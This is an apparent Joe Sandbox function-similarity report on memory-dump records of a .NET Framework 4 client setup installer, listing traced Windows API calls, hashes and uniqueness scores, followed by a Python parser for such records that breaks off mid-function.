                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 0001D71D
  • Part of subcall function 000218BD: __EH_prolog3_catch.LIBCMT ref: 000218C4
  • Part of subcall function 0001DBF8: __EH_prolog3.LIBCMT ref: 0001DBFF
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: H_prolog3H_prolog3_catchH_prolog3_catch_
• String ID:
• API String ID: 1956504941-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• #20.CABINET(0001B250,0001B26E,0001B296,0001B32B,0001B390,0001B48E,0001B3F5,000000FF,?,?,00000000,00000000), ref: 0001AD40
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000285CB: __EH_prolog3.LIBCMT ref: 000285D2
• WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 00028879
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: H_prolog3ObjectSingleWait
• String ID:
• API String ID: 2100491740-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBCMT ref: 0001C518
  • Part of subcall function 000335E6: _malloc.LIBCMT ref: 00033600
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Exception@8Throw_malloc
• String ID:
• API String ID: 3476970888-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0002DC3A,?,?,00000000,00000000,00000000,?,0002A700,00000001,00000214,?,0002DBEB), ref: 00031646
  • Part of subcall function 0002B059: __getptd_noexit.LIBCMT ref: 0002B059
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: AllocateHeap__getptd_noexit
• String ID:
• API String ID: 328603210-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBCMT ref: 00022DBF
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Exception@8Throw
• String ID:
• API String ID: 2005118841-0
                                                                                                                                                                    • Opcode ID: e8759f7d600f073e6f237c14c9f00afbbc06f7433c7b9c40783746f8c5f75420
                                                                                                                                                                    • Instruction ID: de53e3d863fc3eaf0c3b6c1a3110e8cee56d1e9aea2560647db108542fda19f0
                                                                                                                                                                    • Opcode Fuzzy Hash: e8759f7d600f073e6f237c14c9f00afbbc06f7433c7b9c40783746f8c5f75420
                                                                                                                                                                    • Instruction Fuzzy Hash: 12017C71600706AFCB28CFB9C805D5BBBF8EF85754B048A5DA486D7641D770FA45CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(?,?,?,00000000,00015AE3,?,00000000,?,00000000,?,?,?,0001843A,?,40000000,00000005), ref: 00019CD2
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: feaee3f30c5549015e115d430b7ab4f54e2f02582e44a988329e7dbd74fc116b
• Instruction ID: 0b5483019340a48e78534ccc36ada6a573d7520c8018ae147734a26c239c593e
• Opcode Fuzzy Hash: feaee3f30c5549015e115d430b7ab4f54e2f02582e44a988329e7dbd74fc116b
• Instruction Fuzzy Hash: 3EF09032801128FFCF129F98CE858DE7EA5EF04364F104125BE1126161D7719E90E7E0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 6baef478c16dbe6f6a87d85877485089ebc531c3334fb533ec2aee888d2954d4
• Instruction ID: 4fe1d8dda7149646b6fa9f545ff8c1c450ca16be7dd054d8958437bb7b7a2f10
• Opcode Fuzzy Hash: 6baef478c16dbe6f6a87d85877485089ebc531c3334fb533ec2aee888d2954d4
• Instruction Fuzzy Hash: C0012C71100A06EFC711DF24E909699FBF9BF40316F108618E0199F6A1DBB8E994CF91
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 0a78b40938937ee848da36a871b19fcfc27b72be61fa20b7074ac9257cfbb530
• Instruction ID: f5fc9d8a2efdae544bf00802fc1f62e4d68e17453e318620de6087a12f6378e7
• Opcode Fuzzy Hash: 0a78b40938937ee848da36a871b19fcfc27b72be61fa20b7074ac9257cfbb530
• Instruction Fuzzy Hash: 06014B304016A5EFD722EFA4D1057DEB7B4BF25300F14458CE8865B282CB35AA48CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBCMT ref: 00022FD6
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Exception@8Throw
• String ID:
• API String ID: 2005118841-0
• Opcode ID: 4e0f99df234387fc56a37e9c03511f21bb2bd87ec07f48e57e185c2dc494504a
• Instruction ID: 6dcf1719caaac43d3cd392a0c637f10355aa6db950057f79e93dbbe2b44d00bf
• Opcode Fuzzy Hash: 4e0f99df234387fc56a37e9c03511f21bb2bd87ec07f48e57e185c2dc494504a
• Instruction Fuzzy Hash: AEF03430500A15AFCBB1EFA9DA81C66B7F8AB047507148839E99AC7601E720FD40CB60
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00025229
  • Part of subcall function 00024F70: __EH_prolog3.LIBCMT ref: 00024F77
  • Part of subcall function 00028054: __EH_prolog3.LIBCMT ref: 0002805B
  • Part of subcall function 00028054: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00025279,?,?,?,00000000,00028585,?,00000000,?,?,000000CC,00020145), ref: 0002808E
  • Part of subcall function 00025293: __EH_prolog3.LIBCMT ref: 0002529A
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: H_prolog3$ObjectSingleWait
• String ID:
• API String ID: 3802047751-0
• Opcode ID: 611100690c9cdf2345b1a9a1fa1974e92a424a0e1b3fb0b1277ce0ecd0668a89
• Instruction ID: e8187aa49fcb8673efe1d91d0077697a08ca2370c48aa90a9d7a42eccf4d910a
• Opcode Fuzzy Hash: 611100690c9cdf2345b1a9a1fa1974e92a424a0e1b3fb0b1277ce0ecd0668a89
• Instruction Fuzzy Hash: 3DF0B430401669EED702E7F4D505BCDBBA86F21304F148098E19963183CB782708C772
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00020B49
  • Part of subcall function 00024F70: __EH_prolog3.LIBCMT ref: 00024F77
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 2c9d2e3fdc6742e010abb90a94fd1173ecf52767fe3d899e6f5d57cd6efab46a
• Instruction ID: 265c7083b51dd1e10894aba4cf508694a4c50f20e613b0d5878b29cb73e331de
• Opcode Fuzzy Hash: 2c9d2e3fdc6742e010abb90a94fd1173ecf52767fe3d899e6f5d57cd6efab46a
• Instruction Fuzzy Hash: 11F08270500654EFDB11EFA4D405BCEBBB8BF51358F104158E5159B2A3C735AB44CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 4308c6ee847d7d4aa329d2a82b10e64d61e40bcf856d2a33e1b9c4b67f14d7a2
• Instruction ID: 3f388fc5e716d6dfc7976e1da949080e8e9fe3f4dcb5af2eb59d8d1e652121ab
• Opcode Fuzzy Hash: 4308c6ee847d7d4aa329d2a82b10e64d61e40bcf856d2a33e1b9c4b67f14d7a2
• Instruction Fuzzy Hash: F6E01234600B10DBDB22AF54D81678D7A72BB54737F104508E4956F2E2C7781940C651
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 8208959b16bc6e758b1c3d856998d976b931e1094c2f54cdaf4bdd6da11f8e6c
                                                                                                                                                                    • Instruction ID: 00231595e71ecccd176e113baf10e5e966d5de89ae7bb600183b7b7e2592f9a7
                                                                                                                                                                    • Opcode Fuzzy Hash: 8208959b16bc6e758b1c3d856998d976b931e1094c2f54cdaf4bdd6da11f8e6c
                                                                                                                                                                    • Instruction Fuzzy Hash: 42E01234600B10DBDB22AF54D81678D7B72BB54777F108108E4956F2D2C7781940CA51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SendMessageA.USER32(00000405,00000000,00000000,00016381), ref: 000169D5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                    • Opcode ID: 447f421b0cabf046ca79d6e3fe37496fd397a09bb0ca90f08e2dd03b312f651f
                                                                                                                                                                    • Instruction ID: f05fb923c56a49e62d09df6cb02845e2679241ee1f4a47e278ec369b4f588f6b
                                                                                                                                                                    • Opcode Fuzzy Hash: 447f421b0cabf046ca79d6e3fe37496fd397a09bb0ca90f08e2dd03b312f651f
                                                                                                                                                                    • Instruction Fuzzy Hash: 08D0CAB0200112EFFB620B20AC488B632ECAB6A746B814839E600E4060F27E48D9AB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: H_prolog3_catch
• String ID:
• API String ID: 3886170330-0
• Opcode ID: a59269079ec3c8d799754d35487596c234f0c507aa2d2b688a054ac576a9801f
• Instruction ID: 2d32cf1eb97141ff716eb56ccc0e21d3df13abb9cee0ea6b58c9d110f801c296
• Opcode Fuzzy Hash: a59269079ec3c8d799754d35487596c234f0c507aa2d2b688a054ac576a9801f
• Instruction Fuzzy Hash: 6ED06736100118FBDF13AF90DD02FDD3A66BF58345F108115BA0828062C77A9A70AB55
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: H_prolog3_catch
• String ID:
• API String ID: 3886170330-0
• Opcode ID: c6b3ed0bc27ff43915e94fb55df061efb600f79f1898814ffb53b4f76e5e5581
• Instruction ID: 1cba093fe1395be09a29ec45fbacad8cd797baec468478d5272573dd9ee2af4f
• Opcode Fuzzy Hash: c6b3ed0bc27ff43915e94fb55df061efb600f79f1898814ffb53b4f76e5e5581
• Instruction Fuzzy Hash: 53B092B8A48224A3DA42F7F0E0463DC1118AB20303FA04040A204190C3C9BA1A085223
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00027E46: CreateEventA.KERNEL32(00000000,?,00000000,00000000), ref: 00027E5B
• GetLastError.KERNEL32 ref: 0002803E
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: CreateErrorEventLast
• String ID:
• API String ID: 545576003-0
• Opcode ID: 79c11816141e6f9d1f06b4f6a61c77aa3e0210883c27453269a82c7bb4b6b351
• Instruction ID: a4379d1090a4fcfadad6212e3025e31c2702189242c3944a2268b218d6e4f68a
• Opcode Fuzzy Hash: 79c11816141e6f9d1f06b4f6a61c77aa3e0210883c27453269a82c7bb4b6b351
• Instruction Fuzzy Hash: 1501A7F9509225AED7B0BA60ACC5CBB76DCDF54348340883DF24AC2402EB74ED488731
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00019CA3: CreateFileW.KERNELBASE(?,?,?,00000000,00015AE3,?,00000000,?,00000000,?,?,?,0001843A,?,40000000,00000005), ref: 00019CD2
• GetLastError.KERNEL32(?,40000000,00000005,00000002,00000080,00000000,00000000,?,00015AE3,X?f), ref: 00018444
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: CreateErrorFileLast
• String ID:
• API String ID: 1214770103-0
• Opcode ID: 67dc170764428b945cec8702e808750640390782c4ecfc7e488a11c345770a7d
• Instruction ID: 24b1165492f0853600d0887b0a790625ab1952f7e35ab0b58d0944d2566a3f12
• Opcode Fuzzy Hash: 67dc170764428b945cec8702e808750640390782c4ecfc7e488a11c345770a7d
• Instruction Fuzzy Hash: 5DF0B432D4192567E33217A9AC05BDABA989F427B0F16C231FF00FB292DF659E8057D0
Uniqueness

Uniqueness Score: -1.00%
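
The function-similarity records above all follow one fixed layout (an APIs list, optional Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity fields, Uniqueness score), and the questions an analyst asks of them are the same each time: which dumped function reaches a given API, and which records share an API String ID or Opcode ID so that compiler-runtime stubs such as the H_prolog3 variants can be set aside. The parser below is an added example, not code from the Joe Sandbox report or its IDA plugin; the sample text is constructed from three of the records above with indentation and the repeated Associated lines removed, and the names `parse_records`, `callers_of` and `group_by` are this example's own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: three records copied from the report above, indentation
# removed and the repeated "Associated"/"Snapshot File" lines dropped.
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 4308c6ee847d7d4aa329d2a82b10e64d61e40bcf856d2a33e1b9c4b67f14d7a2
• Instruction Fuzzy Hash: F6E01234600B10DBDB22AF54D81678D7A72BB54737F104508E4956F2E2C7781940C651
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000405,00000000,00000000,00016381), ref: 000169D5
Similarity
• API ID: MessageSend
• API String ID: 3850602802-0
• Opcode ID: 447f421b0cabf046ca79d6e3fe37496fd397a09bb0ca90f08e2dd03b312f651f
• Instruction Fuzzy Hash: 08D0CAB0200112EFFB620B20AC488B632ECAB6A746B814839E600E4060F27E48D9AB50
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00019CA3: CreateFileW.KERNELBASE(?,?,?,00000000,00015AE3,?,00000000,?,00000000,?,?,?,0001843A,?,40000000,00000005), ref: 00019CD2
• GetLastError.KERNEL32(?,40000000,00000005,00000002,00000080,00000000,00000000,?,00015AE3,X?f), ref: 00018444
Similarity
• API ID: CreateErrorFileLast
• API String ID: 1214770103-0
• Opcode ID: 67dc170764428b945cec8702e808750640390782c4ecfc7e488a11c345770a7d
• Instruction Fuzzy Hash: 5DF0B432D4192567E33217A9AC05BDABA989F427B0F16C231FF00FB292DF659E8057D0
Uniqueness

Uniqueness Score: -1.00%
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}
# One traced call: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional argument list, then the call-site address after "ref:".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]                   # "?" means the plugin could not resolve it
    ref: str                          # address of the call instruction
    subcall_of: Optional[str] = None  # set when the call lives in a callee


@dataclass
class Record:
    fields: dict = field(default_factory=dict)   # "API ID", "Opcode ID", ...
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    uniqueness: Optional[float] = None


def parse_records(text: str) -> List[Record]:
    """Split report text into one Record per 'APIs' block."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                   # every record starts here
            current = Record()
            records.append(current)
            section = "APIs"
            continue
        if current is None:                  # text before the first record
            continue
        if line in SECTIONS:
            section = line
            continue
        if line.startswith("Uniqueness Score:"):
            current.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
            continue
        body = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:                            # unparsable lines are skipped, not guessed
                args = m["args"].split(",") if m["args"] else []
                current.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
        elif section == "Strings":
            current.strings.append(body)
        else:
            key, _, value = body.partition(":")
            current.fields[key.strip()] = value.strip()
    return records


def callers_of(records: List[Record], api_name: str) -> List[Record]:
    """Records whose trace (direct calls or subcalls) reaches api_name."""
    return [r for r in records if any(c.name == api_name for c in r.apis)]


def group_by(records: List[Record], key: str) -> dict:
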